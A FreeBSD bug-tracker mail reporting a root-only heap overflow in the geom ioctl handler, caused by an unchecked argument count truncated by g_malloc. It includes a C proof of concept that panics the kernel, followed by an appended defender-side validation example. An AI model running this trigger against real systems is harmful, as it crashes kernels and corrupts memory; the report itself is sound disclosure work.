[Bug 209113] Heap overflow in geom ioctl handler

bugzilla-noreply at freebsd.org
Wed Apr 27 22:41:06 UTC 2016


https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209113

            Bug ID: 209113
           Summary: Heap overflow in geom ioctl handler
           Product: Base System
           Version: 11.0-CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs at FreeBSD.org
          Reporter: cturt at hardenedbsd.org

There is a heap overflow in the `ioctl` handler for `geom`, which is
non-critical since it is only triggerable as `root`.

Essentially, there are no checks on the user supplied `req.narg` value. The
code uses this value to calculate a size by multiplying by `sizeof(struct
gctl_req_arg)`, and then calls `g_malloc` and `copyin`.

`g_malloc` treats its `size` parameter as an `int`:

static __inline void *g_malloc(int size, int flags)

So this size will be truncated to 32 bits; however, the `copyin` call will use
the full 64-bit size.

PoC to trigger the bug, resulting in panic (must be run as `root`):

#include <stdio.h>
#include <stdlib.h>     /* malloc, free */
#include <string.h>     /* memset */
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <geom/geom_ctl.h>

int main(void) {
        int result;
        struct gctl_req req;
        int g;

        /* The control device is only openable as root. */
        g = open("/dev/geom.ctl", O_RDONLY);
        if(g == -1) {
                printf("  [-] Couldn't open geom.ctl!\n");
                return 1;
        }

        req.error = malloc(0x100);
        req.lerror = 2;
        req.version = GCTL_VERSION;
        /* Unchecked argument count; narg * sizeof(struct gctl_req_arg)
         * is truncated by g_malloc but used in full by copyin. */
        req.narg = 0x5555556;
        req.arg = malloc(0x4000);
        memset(req.arg, 'a', 0x4000);

        result = ioctl(g, GEOM_CTL, &req);
        printf("%d %d\n", result, errno);

        free(req.arg);
        free(req.error);

        return 0;
}

-- 
You are receiving this mail because:
You are the assignee for the bug.
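A defender-side illustration, added here and not taken from the report or from FreeBSD's own source: the unchecked size arithmetic the report describes placed next to a validation routine that rejects the report's `narg` before any allocation happens. The names `gctl_check_narg`, `MAX_NARG`, `flawed_alloc_size` and the 48-byte stand-in for `struct gctl_req_arg` are assumptions for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <limits.h>
#include <stdio.h>

/* Stand-in for struct gctl_req_arg; the real layout lives in
 * geom_ctl.h. Only the size matters here (assumed 48 bytes on amd64). */
struct gctl_req_arg_stub { char pad[48]; };
#define ARG_SIZE sizeof(struct gctl_req_arg_stub)

/* Upper bound a handler would impose on the argument count (assumed). */
#define MAX_NARG 2048

/* Flawed path as described in the report: the 64-bit product is handed
 * to an allocator whose size parameter is an int, so the allocation is
 * sized from the truncated value while the later copy uses the full
 * product. Returns the size the allocator would actually see. */
static int flawed_alloc_size(uint32_t narg)
{
    size_t full = (size_t)narg * ARG_SIZE;   /* 64-bit product */
    return (int)(uint32_t)full;              /* silently truncated */
}

/* Hardened check: validate narg before any size arithmetic is trusted. */
static bool gctl_check_narg(uint32_t narg, size_t *out_size)
{
    if (narg == 0 || narg > MAX_NARG)
        return false;                        /* explicit bound */
    if (narg > SIZE_MAX / ARG_SIZE)
        return false;                        /* multiplication would overflow */
    size_t size = (size_t)narg * ARG_SIZE;
    if (size > INT_MAX)
        return false;                        /* would not fit an int allocator */
    *out_size = size;
    return true;
}

int main(void)
{
    size_t size;
    uint32_t narg = 0x5555556;               /* value from the report's PoC */
    printf("truncated allocation: %d bytes\n", flawed_alloc_size(narg));
    printf("hardened check accepts: %s\n",
           gctl_check_narg(narg, &size) ? "yes" : "no");
    return 0;
}
```

With the 48-byte stand-in, the report's `narg` produces a product of 0x100000020, so the truncated allocation is 32 bytes while the copy would be over 4 GiB.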
